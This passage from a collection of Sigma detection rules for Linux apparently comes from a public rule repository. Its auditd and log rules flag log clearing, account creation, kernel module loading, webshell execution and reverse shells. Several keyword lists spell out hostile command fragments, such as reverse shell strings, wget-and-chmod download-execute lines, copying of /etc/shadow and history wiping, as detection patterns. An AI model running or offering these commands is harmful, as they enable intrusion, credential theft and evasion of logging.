-F arch=b32 -S syslog -F a0=4 -k clear_dmesg_logs\n        -a always,exit -F arch=b32 -S syslog -F a0=5 -k clear_dmesg_logs\n        -a always,exit -F arch=b32 -S syslog -F a0=6 -k disable_dmesg_logs\ndetection:\n    selection:\n        type: 'SYSCALL'\n        SYSCALL: 'syslog'\n        a0:\n            - 4 # SYSLOG_ACTION_READ_CLEAR : Read and clear log\n            - 5 # SYSLOG_ACTION_CLEAR: Clear kernel ring buffer (without reading)\n            - 6 # SYSLOG_ACTION_CONSOLE_OFF: Disable logging to console\n    condition: selection\nfalsepositives:\n    - System administrators or scripts that intentionally clear logs\n    - Debugging scripts\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/syscall/lnx_auditd_create_account.yml",
    "content": "title: Creation Of A User Account\nid: 759d0d51-bc99-4b5e-9add-8f5b2c8e7512\nstatus: test\ndescription: Detects the creation of a new user account. Such accounts may be used for persistence that does not require persistent remote access tools to be deployed on the system.\nreferences:\n    - https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files\n    - https://access.redhat.com/articles/4409591#audit-record-types-2\n    - https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07\nauthor: Marie Euler, Pawel Mazur\ndate: 2020-05-18\nmodified: 2022-12-20\ntags:\n    - attack.t1136.001\n    - attack.persistence\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection_syscall_record_type:\n        type: 'SYSCALL'\n        exe|endswith: '/useradd'\n    selection_add_user_record_type:\n        type: 'ADD_USER' # This is logged without having to configure audit rules on both Ubuntu and Centos\n    condition: 1 of selection_*\nfalsepositives:\n    - Admin activity\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/syscall/lnx_auditd_load_module_insmod.yml",
    "content": "title: Loading of Kernel Module via Insmod\nid: 106d7cbd-80ff-4985-b682-a7043e5acb72\nstatus: test\ndescription: |\n    Detects loading of kernel modules with the insmod command.\n    Loadable Kernel Modules (LKMs) are pieces of code that can be loaded into and unloaded from the kernel upon demand.\n    Adversaries may use LKMs to obtain persistence within the system or to elevate privileges.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md\n    - https://linux.die.net/man/8/insmod\n    - https://man7.org/linux/man-pages/man8/kmod.8.html\nauthor: 'Pawel Mazur'\ndate: 2021-11-02\nmodified: 2022-12-25\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1547.006\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'SYSCALL'\n        comm: insmod\n        exe: /usr/bin/kmod\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/auditd/syscall/lnx_auditd_network_service_scanning.yml",
    "content": "title: Linux Network Service Scanning - Auditd\nid: 3761e026-f259-44e6-8826-719ed8079408\nrelated:\n    - id: 3e102cd9-a70d-4a7a-9508-403963092f31\n      type: derived\nstatus: test\ndescription: Detects enumeration of local or remote network services.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md\nauthor: Alejandro Ortuno, oscd.community\ndate: 2020-10-21\nmodified: 2023-09-26\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    product: linux\n    service: auditd\n    definition: 'Configure these rules https://github.com/Neo23x0/auditd/blob/e181243a7c708e9d579557d6f80e0ed3d3483b89/audit.rules#L182-L183'\ndetection:\n    selection:\n        type: 'SYSCALL'\n        exe|endswith:\n            - '/telnet'\n            - '/nmap'\n            - '/netcat'\n            - '/nc'\n            - '/ncat'\n            - '/nc.openbsd'\n        key: 'network_connect_4'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/syscall/lnx_auditd_split_file_into_pieces.yml",
    "content": "title: Split A File Into Pieces - Linux\nid: 2dad0cba-c62a-4a4f-949f-5f6ecd619769\nstatus: test\ndescription: 'Detects use of the \"split\" command to split files into pieces, possibly in preparation for transfer.'\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md\nauthor: 'Igor Fits, oscd.community'\ndate: 2020-10-15\nmodified: 2022-11-28\ntags:\n    - attack.exfiltration\n    - attack.t1030\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'SYSCALL'\n        comm: 'split'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative activity\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/syscall/lnx_auditd_susp_discovery_sysinfo_syscall.yml",
    "content": "title: System Info Discovery via Sysinfo Syscall\nid: b207d563-a1d9-4275-b349-77d1eb55aa6d\nstatus: experimental\ndescription: |\n    Detects use of the sysinfo system call in Linux, which provides a snapshot of key system statistics such as uptime, load averages, memory usage, and the number of running processes.\n    Malware or reconnaissance tools might leverage sysinfo to fingerprint the system - gathering data to determine if it's a viable target.\nreferences:\n    - https://github.com/CheraghiMilad/bypass-Neo23x0-auditd-config/blob/f1c478a37911a5447d5ffcd580f22b167bf3df14/sysinfo-syscall/README.md\n    - https://man7.org/linux/man-pages/man2/sysinfo.2.html\nauthor: Milad Cheraghi\ndate: 2025-05-30\nmodified: 2025-12-05\ntags:\n    - attack.discovery\n    - attack.t1057\n    - attack.t1082\nlogsource:\n    product: linux\n    service: auditd\n    definition: |\n        Required auditd configuration:\n        -a always,exit -F arch=b64 -S sysinfo -k discovery_sysinfo_syscall\n        -a always,exit -F arch=b32 -S sysinfo -k discovery_sysinfo_syscall\ndetection:\n    selection:\n        type: 'SYSCALL'\n        SYSCALL: 'sysinfo'\n    filter_optional_splunk:\n        exe|endswith: '/bin/splunkd'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate administrative activity\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/syscall/lnx_auditd_susp_exe_folders.yml",
    "content": "title: Program Executions in Suspicious Folders\nid: a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc\nstatus: test\ndescription: Detects program executions in suspicious non-program folders related to malware or hacking activity\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-01-23\nmodified: 2021-11-27\ntags:\n    - attack.t1587\n    - attack.t1584\n    - attack.resource-development\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'SYSCALL'\n        exe|startswith:\n            # Temporary folder\n            - '/tmp/'\n            # Web server\n            - '/var/www/'              # Standard\n            - '/home/*/public_html/'   # Per-user\n            - '/usr/local/apache2/'    # Classical Apache\n            - '/usr/local/httpd/'      # Old SuSE Linux 6.* Apache\n            - '/var/apache/'           # Solaris Apache\n            - '/srv/www/'              # SuSE Linux 9.*\n            - '/home/httpd/html/'      # Redhat 6 or older Apache\n            - '/srv/http/'             # ArchLinux standard\n            - '/usr/share/nginx/html/' # ArchLinux nginx\n            # Data dirs of typically exploited services (incomplete list)\n            - '/var/lib/pgsql/data/'\n            - '/usr/local/mysql/data/'\n            - '/var/lib/mysql/'\n            - '/var/vsftpd/'\n            - '/etc/bind/'\n            - '/var/named/'\n    condition: selection\nfalsepositives:\n    - Admin activity (especially in /tmp folders)\n    - Crazy web applications\nlevel: medium\n"
  },
  {
    "path": "rules/linux/auditd/syscall/lnx_auditd_susp_special_file_creation_via_mknod_syscall.yml",
    "content": "title: Special File Creation via Mknod Syscall\nid: 710bdbce-495d-491d-9a8f-7d0d88d2b41e\nstatus: experimental\ndescription: |\n    Detects usage of the `mknod` syscall to create special files (e.g., character or block devices).\n    Attackers or malware might use `mknod` to create fake devices, interact with kernel interfaces,\n    or establish covert channels in Linux systems.\n    Monitoring the use of `mknod` is important because this syscall is rarely used by legitimate applications,\n    and it can be abused to bypass file system restrictions or create backdoors.\nreferences:\n    - https://man7.org/linux/man-pages/man2/mknod.2.html\n    - https://hopeness.medium.com/master-the-linux-mknod-command-a-comprehensive-guide-1c150a546aa8\nauthor: Milad Cheraghi\ndate: 2025-05-31\nmodified: 2025-12-05\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1543.003\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'SYSCALL'\n        SYSCALL: 'mknod'\n    condition: selection\nfalsepositives:\n    - Device creation by legitimate scripts or init systems (udevadm, MAKEDEV)\n    - Container runtimes or security tools during initialization\nlevel: low\n"
  },
  {
    "path": "rules/linux/auditd/syscall/lnx_auditd_web_rce.yml",
    "content": "title: Webshell Remote Command Execution\nid: c0d3734d-330f-4a03-aae2-65dacc6a8222\nstatus: test\ndescription: Detects possible command execution by web application/web shell\nreferences:\n    - Personal Experience of the Author\n    - https://www.vaadata.com/blog/what-is-command-injection-exploitations-and-security-best-practices/\nauthor: Ilyas Ochkov, Beyu Denis, oscd.community\ndate: 2019-10-12\nmodified: 2025-12-05\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    product: linux\n    service: auditd\n    definition: |\n        Required auditd configuration:\n        -a always,exit -F arch=b32 -S execve -F euid=33 -k detect_execve_www\n        -a always,exit -F arch=b64 -S execve -F euid=33 -k detect_execve_www\n        -a always,exit -F arch=b32 -S execveat -F euid=33 -k detect_execve_www\n        -a always,exit -F arch=b64 -S execveat -F euid=33 -k detect_execve_www\n        Change the number \"33\" to the ID of your WebServer user. Default: www-data:x:33:33\ndetection:\n    selection:\n        type: 'SYSCALL'\n        SYSCALL:\n            - 'execve'\n            - 'execveat'\n        euid: 33\n    condition: selection\nfalsepositives:\n    - Admin activity\n    - Crazy web applications\nlevel: critical\n"
  },
  {
    "path": "rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml",
    "content": "title: Relevant ClamAV Message\nid: 36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb\nstatus: stable\ndescription: Detects relevant ClamAV messages\nreferences:\n    - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-01\ntags:\n    - attack.resource-development\n    - attack.t1588.001\nlogsource:\n    product: linux\n    service: clamav\ndetection:\n    keywords:\n        - 'Trojan*FOUND'\n        - 'VirTool*FOUND'\n        - 'Webshell*FOUND'\n        - 'Rootkit*FOUND'\n        - 'Htran*FOUND'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/cron/lnx_cron_crontab_file_modification.yml",
    "content": "title: Modifying Crontab\nid: af202fd3-7bff-4212-a25a-fb34606cfcbe\nstatus: test\ndescription: Detects suspicious modification of crontab file.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md\nauthor: Pawel Mazur\ndate: 2022-04-16\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.003\nlogsource:\n    product: linux\n    service: cron\ndetection:\n    keywords:\n        - 'REPLACE'\n    condition: keywords\nfalsepositives:\n    - Legitimate modification of crontab\nlevel: medium\n"
  },
  {
    "path": "rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml",
    "content": "title: Guacamole Two Users Sharing Session Anomaly\nid: 1edd77db-0669-4fef-9598-165bda82826d\nstatus: test\ndescription: Detects suspicious session with two users present\nreferences:\n    - https://research.checkpoint.com/2020/apache-guacamole-rce/\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-07-03\nmodified: 2021-11-27\ntags:\n    - attack.credential-access\n    - attack.t1212\nlogsource:\n    product: linux\n    service: guacamole\ndetection:\n    selection:\n        - '(2 users now present)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/lnx_apt_equationgroup_lnx.yml",
    "content": "title: Equation Group Indicators\nid: 41e5c73d-9983-4b69-bd03-e13b67e9623c\nstatus: test\ndescription: Detects suspicious shell commands used in various Equation Group scripts and tools\nreferences:\n    - https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-04-09\nmodified: 2021-11-27\ntags:\n    - attack.execution\n    - attack.g0020\n    - attack.t1059.004\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        # evolvingstrategy, elgingamble, estesfox\n        - 'chown root*chmod 4777 '\n        - 'cp /bin/sh .;chown'\n        # tmpwatch\n        - 'chmod 4777 /tmp/.scsi/dev/bin/gsh'\n        - 'chown root:root /tmp/.scsi/dev/bin/'\n        # estesfox\n        - 'chown root:root x;'\n        # ratload\n        - '/bin/telnet locip locport < /dev/console | /bin/sh'\n        - '/tmp/ratload'\n        # ewok\n        - 'ewok -t '\n        # xspy\n        - 'xspy -display '\n        # elatedmonkey\n        - 'cat > /dev/tcp/127.0.0.1/80 <<END'\n        # ftshell\n        - 'rm -f /current/tmp/ftshell.latest'\n        # ghost\n        - 'ghost_* -v '\n        # morerats client\n        - ' --wipe > /dev/null'\n        # noclient\n        - 'ping -c 2 *; grep * /proc/net/arp >/tmp/gx'\n        - 'iptables * OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;'\n        # auditcleaner\n        - '> /var/log/audit/audit.log; rm -f .'\n        - 'cp /var/log/audit/audit.log .tmp'\n        # reverse shell\n        - 'sh >/dev/tcp/* <&1 2>&1'\n        # packrat\n        - 'ncat -vv -l -p * <'\n        - 'nc -vv -l -p * <'\n        # empty bowl\n        - '< /dev/console | uudecode && uncompress'\n        - 'sendmail -osendmail;chmod +x sendmail'\n        # echowrecker\n        - '/usr/bin/wget -O /tmp/a http* && chmod 755 /tmp/cron'\n        # dubmoat\n        - 'chmod 666 /var/run/utmp~'\n        # poptop\n        - 'chmod 700 nscd crond'\n        # abopscript\n        - 'cp /etc/shadow /tmp/.'\n        # ys\n        - '</dev/console |uudecode > /dev/null 2>&1 && uncompress'\n        # jacktelnet\n        - 'chmod 700 jp&&netstat -an|grep'\n        # others\n        - 'uudecode > /dev/null 2>&1 && uncompress -f * && chmod 755'\n        - 'chmod 700 crond'\n        - 'wget http*; chmod +x /tmp/sendmail'\n        - 'chmod 700 fp sendmail pt'\n        - 'chmod 755 /usr/vmsys/bin/pipe'\n        - 'chmod -R 755 /usr/vmsys'\n        - 'chmod 755 $opbin/*tunnel'\n        - 'chmod 700 sendmail'\n        - 'chmod 0700 sendmail'\n        - '/usr/bin/wget http*sendmail;chmod +x sendmail;'\n        - '&& telnet * 2>&1 </dev/console'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/lnx_buffer_overflows.yml",
    "content": "title: Buffer Overflow Attempts\nid: 18b042f0-2ecd-4b6e-9f8d-aa7a7e7de781\nstatus: test\ndescription: Detects buffer overflow attempts in Unix system log files\nreferences:\n    - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml  # OSSEC attack detection rules\n    - https://docs.oracle.com/cd/E19683-01/816-4883/6mb2joatd/index.html  # Exec stack syslog message (noexec_user_stack)\n    - https://www.giac.org/paper/gcih/266/review-ftp-protocol-cyber-defense-initiative/102802  # WU-FTPD exploit \"0bin0sh\" analysis\n    - https://blu.org/mhonarc/discuss/2001/04/msg00285.php  # RPC.statd exploit attempt log example\n    - https://rapid7.com/blog/post/2019/02/19/stack-based-buffer-overflow-attacks-what-you-need-to-know/  # Stack smashing protector alert example\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-01\nmodified: 2025-03-17\ntags:\n    - attack.t1068\n    - attack.privilege-escalation\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        - 'attempt to execute code on stack by'\n        - '0bin0sh1'\n        # - 'rpc.statd[\\d+]: gethostbyname error for'  # it's an expensive regex and produces questionable results\n        - 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'  # this can cause false positives in Base64 encoded data\n        - 'stack smashing detected'\n    condition: keywords\nfalsepositives:\n    - Base64 encoded data in log entries\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/lnx_clear_syslog.yml",
    "content": "title: Commands to Clear or Remove the Syslog - Builtin\nid: e09eb557-96d2-4de9-ba2d-30f712a5afd3\nstatus: test\ndescription: Detects specific commands commonly used to remove or empty the syslog\nreferences:\n    - https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474\nauthor: Max Altgelt (Nextron Systems)\ndate: 2021-09-10\nmodified: 2022-11-26\ntags:\n    - attack.impact\n    - attack.t1565.001\nlogsource:\n    product: linux\ndetection:\n    selection:\n        - 'rm /var/log/syslog'\n        - 'rm -r /var/log/syslog'\n        - 'rm -f /var/log/syslog'\n        - 'rm -rf /var/log/syslog'\n        - 'mv /var/log/syslog'\n        - ' >/var/log/syslog'\n        - ' > /var/log/syslog'\n    falsepositives:\n        - '/syslog.'\n    condition: selection and not falsepositives\nfalsepositives:\n    - Log rotation\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/lnx_file_copy.yml",
    "content": "title: Remote File Copy\nid: 7a14080d-a048-4de8-ae58-604ce58a795b\nstatus: stable\ndescription: Detects the use of tools that copy files from or to remote systems\nreferences:\n    - https://www.cisa.gov/stopransomware/ransomware-guide\nauthor: Ömer Günal\ndate: 2020-06-18\ntags:\n    - attack.command-and-control\n    - attack.lateral-movement\n    - attack.t1105\nlogsource:\n    product: linux\ndetection:\n    tools:\n        - 'scp '\n        - 'rsync '\n        - 'sftp '\n    filter:\n        - '@'\n        - ':'\n    condition: tools and filter\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/builtin/lnx_ldso_preload_injection.yml",
    "content": "title: Code Injection by ld.so Preload\nid: 7e3c4651-c347-40c4-b1d4-d48590fdf684\nstatus: test\ndescription: Detects the ld.so preload persistence file. See `man ld.so` for more information.\nreferences:\n    - https://man7.org/linux/man-pages/man8/ld.so.8.html\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-05-05\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1574.006\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        - '/etc/ld.so.preload'\n    condition: keywords\nfalsepositives:\n    - Rare temporary workaround for library misconfiguration\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/lnx_potential_susp_ebpf_activity.yml",
    "content": "title: Potential Suspicious BPF Activity - Linux\nid: 0fadd880-6af3-4610-b1e5-008dc3a11b8a\nstatus: test\ndescription: Detects the presence of \"bpf_probe_write_user\" BPF helper-generated warning messages, which could be a sign of suspicious eBPF activity on the system.\nreferences:\n    - https://redcanary.com/blog/ebpf-malware/\n    - https://man7.org/linux/man-pages/man7/bpf-helpers.7.html\nauthor: Red Canary (idea), Nasreddine Bencherchali\ndate: 2023-01-25\ntags:\n    - attack.persistence\n    - attack.defense-evasion\nlogsource:\n    product: linux\ndetection:\n    selection:\n        - 'bpf_probe_write_user'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/lnx_privileged_user_creation.yml",
    "content": "title: Privileged User Has Been Created\nid: 0ac15ec3-d24f-4246-aa2a-3077bb1cf90e\nstatus: test\ndescription: Detects the addition of a new user to a privileged group such as \"root\" or \"sudo\"\nreferences:\n    - https://digital.nhs.uk/cyber-alerts/2018/cc-2825\n    - https://linux.die.net/man/8/useradd\n    - https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid\nauthor: Pawel Mazur\ndate: 2022-12-21\nmodified: 2025-01-21\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1136.001\n    - attack.t1098\nlogsource:\n    product: linux\n    definition: '/var/log/secure on RHEL systems or /var/log/auth.log on Debian-like systems needs to be collected in order for this detection to work'\ndetection:\n    # Examples of the events that could be observed when matching these would be as follows\n    #   Dec 21 16:42:19 testserver useradd[1337]: new user: name=butter1, UID=1000, GID=0, home=/root, shell=/bin/bash\n    #   Dec 21 17:13:54 testserver useradd[1337]: new user: name=john, UID=0, GID=0, home=/home/john, shell=/bin/bash\n    #   Dec 21 17:24:40 testserver useradd[1337]: new user: name=butter3, UID=1000, GID=10, home=/home/butter3, shell=/bin/bash\n    #   Dec 21 17:30:22 testserver useradd[1337]: new user: name=butter4, UID=1000, GID=27, home=/home/butter4, shell=/bin/bash\n    selection_new_user:\n        - 'new user'\n    selection_uids_gids:\n        - 'GID=0,' # root group\n        - 'UID=0,' # root UID\n        - 'GID=10,' # wheel group\n        - 'GID=27,' # sudo group\n    condition: all of selection_*\nfalsepositives:\n    - Administrative activity\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/lnx_shell_clear_cmd_history.yml",
    "content": "title: Linux Command History Tampering\nid: fdc88d25-96fb-4b7c-9633-c0e417fdbd4e\nstatus: test\ndescription: |\n    Detects commands that try to clear or tamper with the Linux command history.\n    This technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as \"bash_history\" or \"zsh_history\".\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md\n    - https://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics\n    - https://www.cadosecurity.com/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence/\nauthor: Patrick Bareiss\ndate: 2019-03-24\nmodified: 2024-04-17\ntags:\n    - attack.defense-evasion\n    - attack.t1070.003\n# Example config for this one (place it in .bash_profile):\n#  (is_empty=false; inotifywait -m .bash_history | while read file; do if [ $(wc -l <.bash_history) -lt 1  ]; then if  [ \"$is_empty\" = false ]; then logger -i -p local5.info -t empty_bash_history \"$USER : ~/.bash_history is empty \"; is_empty=true; fi; else is_empty=false;  fi;  done ) &\n#  It monitors the size of .bash_history and logs the words \"empty_bash_history\" whenever a previously non-empty bash_history becomes empty\n#  We define an empty file as a document with 0 or 1 lines (it can be a line with only one space character, for example)\n#  It has two advantages over the version suggested by Patrick Bareiss:\n#    - it is not tied to the exact command used to clear .bash_history: for instance Caldera uses \"> .bash_history\" to clear the history and this is not one of the commands listed here. We can't be exhaustive for all the possibilities!\n#    - the method suggested by Patrick Bareiss logs all the commands entered directly in a bash shell, therefore it may miss some events (for instance it doesn't log the commands launched from a Caldera agent). Here, if .bash_history is cleared, it will always be detected\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        - 'cat /dev/null >*sh_history'\n        - 'cat /dev/zero >*sh_history'\n        - 'chattr +i*sh_history'\n        - 'echo \"\" >*sh_history'\n        - 'empty_bash_history'\n        - 'export HISTFILESIZE=0'\n        - 'history -c'\n        - 'history -w'\n        - 'ln -sf /dev/null *sh_history'\n        - 'ln -sf /dev/zero *sh_history'\n        - 'rm *sh_history'\n        - 'shopt -ou history'\n        - 'shopt -uo history'\n        - 'shred *sh_history'\n        - 'truncate -s0 *sh_history'\n        # - 'unset HISTFILE'  # prone to false positives\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/lnx_shell_susp_commands.yml",
    "content": "title: Suspicious Activity in Shell Commands\nid: 2aa1440c-9ae9-4d92-84a7-a9e5f5e31695\nstatus: test\ndescription: Detects suspicious shell commands used in various exploit codes (see references)\nreferences:\n    - https://web.archive.org/web/20170319121015/http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html\n    - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb\n    - http://pastebin.com/FtygZ1cg\n    - https://artkond.com/2017/03/23/pivoting-guide/\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-08-21\nmodified: 2021-11-27\ntags:\n    - attack.execution\n    - attack.t1059.004\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        # Generic suspicious commands\n        - 'wget * - http* | perl'\n        - 'wget * - http* | sh'\n        - 'wget * - http* | bash'\n        - 'python -m SimpleHTTPServer'\n        - '-m http.server'      # Python 3\n        - 'import pty; pty.spawn*'\n        - 'socat exec:*'\n        - 'socat -O /tmp/*'\n        - 'socat tcp-connect*'\n        - '*echo binary >>*'\n        # Malware\n        - '*wget *; chmod +x*'\n        - '*wget *; chmod 777 *'\n        - '*cd /tmp || cd /var/run || cd /mnt*'\n        # Apache Struts in-the-wild exploit codes\n        - '*stop;service iptables stop;*'\n        - '*stop;SuSEfirewall2 stop;*'\n        - 'chmod 777 2020*'\n        - '*>>/etc/rc.local'\n        # Metasploit framework exploit codes\n        - '*base64 -d /tmp/*'\n        - '* | base64 -d *'\n        - '*/chmod u+s *'\n        - '*chmod +s /tmp/*'\n        - '*chmod u+s /tmp/*'\n        - '* /tmp/haxhax*'\n        - '* /tmp/ns_sploit*'\n        - 'nc -l -p *'\n        - 'cp /bin/ksh *'\n        - 'cp /bin/sh *'\n        - '* /tmp/*.b64 *'\n        - '*/tmp/ysocereal.jar*'\n        - '*/tmp/x *'\n        - '*; chmod +x /tmp/*'\n        - '*;chmod +x /tmp/*'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/lnx_shell_susp_log_entries.yml",
    "content": "title: Suspicious Log Entries\nid: f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1\nstatus: test\ndescription: Detects suspicious log entries in Linux log files\nreferences:\n    - https://github.com/ossec/ossec-hids/blob/f6502012b7380208db81f82311ad4a1994d39905/etc/rules/syslog_rules.xml\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-25\nmodified: 2021-11-27\ntags:\n    - attack.impact\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        # Generic suspicious log lines\n        - 'entered promiscuous mode'\n        # OSSEC https://github.com/ossec/ossec-hids/blob/master/etc/rules/syslog_rules.xml\n        - 'Deactivating service'\n        - 'Oversized packet received from'\n        - 'imuxsock begins to drop messages'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/builtin/lnx_shell_susp_rev_shells.yml",
    "content": "title: Suspicious Reverse Shell Command Line\nid: 738d9bcf-6999-4fdb-b4ac-3033037db8ab\nstatus: test\ndescription: Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell\nreferences:\n    - https://alamot.github.io/reverse_shells/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-04-02\nmodified: 2021-11-27\ntags:\n    - attack.execution\n    - attack.t1059.004\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        - 'BEGIN {s = \"/inet/tcp/0/'\n        - 'bash -i >& /dev/tcp/'\n        - 'bash -i >& /dev/udp/'\n        - 'sh -i >$ /dev/udp/'\n        - 'sh -i >$ /dev/tcp/'\n        - '&& while read line 0<&5; do'\n        - '/bin/bash -c exec 5<>/dev/tcp/'\n        - '/bin/bash -c exec 5<>/dev/udp/'\n        - 'nc -e /bin/sh '\n        - '/bin/sh | nc'\n        - 'rm -f backpipe; mknod /tmp/backpipe p && nc '\n        - ';socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i))))'\n        - ';STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'\n        - '/bin/sh -i <&3 >&3 2>&3'\n        - 'uname -a; w; id; /bin/bash -i'\n        - '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()};'\n        - ';os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(''HISTFILE'',''/dev/null'');'\n        - '.to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'\n        - ';while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print'\n        - 'socat exec:''bash -li'',pty,stderr,setsid,sigint,sane tcp:'\n        - 'rm -f /tmp/p; mknod /tmp/p p &&'\n        - ' | /bin/bash | telnet '\n        - ',echo=0,raw tcp-listen:'\n        - 'nc -lvvp '\n        - 'xterm -display 1'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/lnx_shellshock.yml",
    "content": "title: Shellshock Expression\nid: c67e0c98-4d39-46ee-8f6b-437ebf6b950e\nstatus: test\ndescription: Detects shellshock expressions in log files\nreferences:\n    - https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-14\nmodified: 2022-10-09\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        - '(){:;};'\n        - '() {:;};'\n        - '() { :;};'\n        - '() { :; };'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/builtin/lnx_susp_dev_tcp.yml",
